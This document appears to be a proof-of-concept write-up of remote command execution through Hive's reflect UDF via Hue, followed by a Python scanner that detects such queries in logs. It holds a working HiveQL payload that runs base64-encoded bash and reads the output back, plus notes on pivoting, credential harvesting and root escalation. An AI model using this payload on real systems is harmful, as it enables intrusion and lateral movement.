hue-hive-rce

Preparation

create table workspace_hs.out as select "Hendrik Schultze @ InnoGames";
truncate table workspace_hs.out;

Command and get output

SELECT reflect("java.lang.Runtime", "exec", concat("bash -c {echo,",base64(encode("${cmd} &> /tmp/out", 'UTF-8')),"}|{base64,-d}|{bash,-i}"));
truncate table workspace_hs.out;
LOAD DATA LOCAL INPATH '/tmp/out' INTO TABLE workspace_hs.out;
select * from workspace_hs.out;

Impact

Depending on the user (hive or, in the worst case, root), we can at least save and run scripts inside the datacenter from /tmp. We can therefore use that server as a base for future attacks on the whole environment, checking the local server (ss -tulpn, ps auxf, enumeration...) or looking for other servers. Internal Big Data systems are often not fully protected because they are set up insecurely by default. This allows us to read configurations (potential credentials etc.) from the Apache ResourceManager, Apache ZooKeeper, etc. Because these Big Data stacks offer many APIs, we can submit MapRed jobs executed on HDFS, connect to Apache Kafka, or use many other options. If we are not root, we can often easily escalate to root, e.g. with logrotten.
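
Detection, as an added example that is not part of this repository: a scanner for Hue/HiveServer2 query history that flags the two constructs used above, a reflection UDF call and LOAD DATA LOCAL INPATH, while ignoring mentions inside comments and string literals. The (user, statement) input format, the shortlist of process-spawning classes and the severity labels are assumptions.

```python
import re

# Hive built-ins that call arbitrary Java methods by reflection.
REFLECTION_UDFS = ("reflect", "reflect2", "java_method")
# Classes that start OS processes (assumed shortlist, extend as needed).
PROCESS_CLASSES = ("java.lang.runtime", "java.lang.processbuilder")

def _quoted(q):  # pattern for a string literal delimited by q, backslash escapes allowed
    return q + r"(?:[^" + q + r"\\]|\\.)*" + q

# Group 1 is a "--" comment; otherwise the match is a string literal.
TOKEN = re.compile(r"(--[^\n]*)|" + _quoted("'") + "|" + _quoted('"'), re.S)
UDF_CALL = re.compile(
    r"\b(%s)\s*\(\s*(?:\x00(\d+)\x00)?" % "|".join(REFLECTION_UDFS), re.I)
LOCAL_LOAD = re.compile(r"\bload\s+data\s+local\s+inpath\s+\x00(\d+)\x00", re.I)

def scan_statement(sql):
    """Return (severity, construct, argument) findings for one statement."""
    literals = []
    def mask(m):
        if m.group(1):                      # comment: drop it
            return " "
        literals.append(m.group(0)[1:-1])   # literal: keep text, hide from matching
        return "\x00%d\x00" % (len(literals) - 1)
    masked = TOKEN.sub(mask, sql)
    findings = []
    for m in UDF_CALL.finditer(masked):
        # A class name that is not a plain literal cannot be vetted statically.
        cls = literals[int(m.group(2))] if m.group(2) else "<dynamic>"
        risky = cls == "<dynamic>" or cls.lower() in PROCESS_CLASSES
        findings.append(("critical" if risky else "review", m.group(1).lower(), cls))
    for m in LOCAL_LOAD.finditer(masked):
        findings.append(("review", "load data local inpath", literals[int(m.group(1))]))
    return findings

def scan_log(entries):  # entries: (user, statement) pairs from a query history
    return [(user,) + f for user, sql in entries for f in scan_statement(sql)]

SAMPLE_LOG = [  # constructed entries, not real logs
    ("etl", "SELECT count(*) FROM sales -- reflect('x') only in a comment"),
    ("etl", "SELECT 'reflect(\"java.lang.Runtime\")' AS note"),
    ("bi", "SELECT java_method('java.lang.Math', 'max', 2, 3)"),
    ("hs", 'SELECT reflect("java.lang.Runtime", "exec", concat("bash -c ", "${cmd}"))'),
    ("hs", "LOAD DATA LOCAL INPATH '/tmp/out' INTO TABLE workspace_hs.out"),
]

if __name__ == "__main__":
    for row in scan_log(SAMPLE_LOG):
        print(row)
```

HiveServer2 can also refuse these functions outright through its hive.server2.builtin.udf.blacklist setting.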